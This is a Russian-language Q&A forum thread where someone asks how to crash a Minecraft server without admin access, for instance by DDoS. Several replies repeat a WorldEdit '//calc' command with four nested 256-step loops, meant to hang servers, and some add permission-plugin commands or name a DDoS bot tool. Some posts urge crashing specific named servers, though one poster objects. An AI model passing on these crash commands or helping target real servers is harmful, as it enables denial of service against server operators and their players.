Олеся Молдавская

Как крашнуть сервер Minecraft?

без админки

и желательно без захода) ) ддос какой посоветуйте

Ил
Ильгам

//calc for(i=0;i<256;i++){for(j=0;j<256;j++){for(k=0;k<256;k++){for(l=0;l<256;l++){ln(pi)}}}}

Er Er

Ну я вижк то что это было 4 года назат но есть такая команда каторая на топ серверах не робит а вот на школо серверах вазможно: //calc for(i=0;i<256;i++){for(j=0;j<256;j++){for(k=0;k<256;k++){for(l=0;l<256;l++){ln(pi)}}}}

Юлия

Крашни, пожалуйста, одни из самых известных

Ольга Сретенцева

//calc for(i=0;i<256;i++){for(j=0;j<256;j++){for(k=0;k<256;k++){for(l=0;l<256;l++){ln(pi)}}}} красава!!!!

Кристина Кудинова

Не как если только прогу установить.

.
С
.

Парвиз Ниёзов

/pex promote a a /pex demote a a или //calc for(i=0;i<256;i++){for(j=0;j<256;j++){for(k=0;k<256;k++){for(l=0;l<256;l++){ln(pi)}}}} это стоп а если ддос то только на школо

Валера Сычёв

КРАШНИ СЕРВЕР Emeraldix ПОТОМУ ЧТО ХОТЬ КАК НО ТАМ БЕСПРЕДЕЛ!!!!

Александр Живых

Крашните EnderDest обман на кейсы

Eldar

Эти команды безполезны на больших серверах, они будет работать только на ШКОЛО серверах, так как там херово настроено. да и программы тут почти безсильны.

Надя

DeathBot

Наталья

Здравствуйте. Обьясните: За что вы хотите крашнуть сервер майнкрафт?
Зачем без причины крашить сервера? Ладно там бы был обман на донат? Представьте бы все щяс полезли "хакать" сервера. Так никто вам не скажет, а DeathBot сожрёт комп.

Ан
Андрей

//calc for(i=0;i<256;i++){for(j=0;j<256;j++){for(k=0;k<256;k++){for(l=0;l<256;l++){ln(pi)}}}}. Если на школо серверах есть ChatManager или ChatGuard, то там 50 проц заблочена эта команда и за неё дают бан, так что сначала надо посмотреть список пл. Не понимаю, зачем люди крашут сервера..

Alex Kvak

КРАШНИТЕ VILLAGEMC!!! ЧИСТЫЙ ОБМАН НА ДОНАТ!!!

Irina Irina

//calc for(i=0;i<256;i++){for(j=0;j<256;j++){for(k=0;k<256;k++){for(l=0;l<256;l++){ln(pi)}}}}
не работает